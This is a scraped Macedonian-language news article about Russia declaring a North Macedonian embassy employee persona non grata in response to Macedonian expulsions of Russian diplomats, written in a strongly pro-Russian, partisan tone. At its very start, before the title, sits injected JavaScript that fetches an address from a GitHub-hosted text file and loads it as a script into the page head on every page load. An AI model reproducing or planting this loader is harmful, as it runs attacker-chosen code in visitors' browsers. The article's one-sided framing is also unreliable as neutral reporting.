;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Пристигнаа првите реципрочни мерки од Руската Федерација - Антропол
АктуелноИнтернационалноЛокално

Пристигнаа првите реципрочни мерки од Руската Федерација

Изминатите неколку години, македонското МНР постојано се приклучува кон анти-руските санкции на САД и земјите од Европската Унија. Во измеќарската политика на македонската дипломатија никогаш не беа доволно проанализирани потребноста, ползата или штетноста на ваквите политики. Само во претходните два месеци, во два наврати, беа протерувани руски дипломати. во знак на солидарност со европските земји. Првото протерување беше во април поврзано со случајот Навални, а второто протерување претседателот Пендаровски го врачи на почетокот од мај.

Од страна на претседателот на Руската Федерација, Владимир Владимирович Путин, на почетокот од годината беше најавено дека Русија повеќе нема да го толерира ваквото дипломатско однесување на земјите од „западот“ и најави реципрочни мерки за секоја ваква дипломатска одлука, од страна на овие држави.

Се чини дека македонските власти оваа порака не ја разбраа доволно сериозно, не само што продолжија со антируската политика, туку и дозволија провокативни реакции на социјалните мрежи од страна на министерот Османи.

После неколкуте вакви дипломатски нелогичности од македонска страна, портпаролот на руското МНР, Марија Захарова, дополнително реагираше и најави реципрочни мерки, потенцирајки го фактот дека Македонија во Русија има само двајца дипломати и дека доколку тие одговорат реципрочно на ова, тогаш државата би останала без ниту еден официјален претставител.

Денес од руското МНР беше одлучено да дадат одговор за ваквите политики:

„На 10 јуни, в.д. амбасадор на Република Северна Македонија во Руската Федерација Оливера Чаушевска-Димовска беше поканета во Министерството за надворешни работи на Русија, каде ѝ беше врачена нота на Министерството, со која вработен во Амбасадата на Северна Македонија во Москва се прогласува за „персона нон грата. Оваа мерка е одговор на сосема немотивирана одлука на македонската страна за прогласувањето на дипломат во Амбасадата на Русија во Скопје за „персона нон грата“, која беше донесена во мај оваа година.”

Иако од македонска страна беше покажано непочитување кон Руската Федерација, со одлуката да не протераат македонските дипломати (што би било реципрочна мерка кон Република Македонија), руската амбасада со протерувањето на вработен од амбасадата покажаа доблест и почит кон Република Македонија, зачувувајќи ги нејзините дипломати во Русија.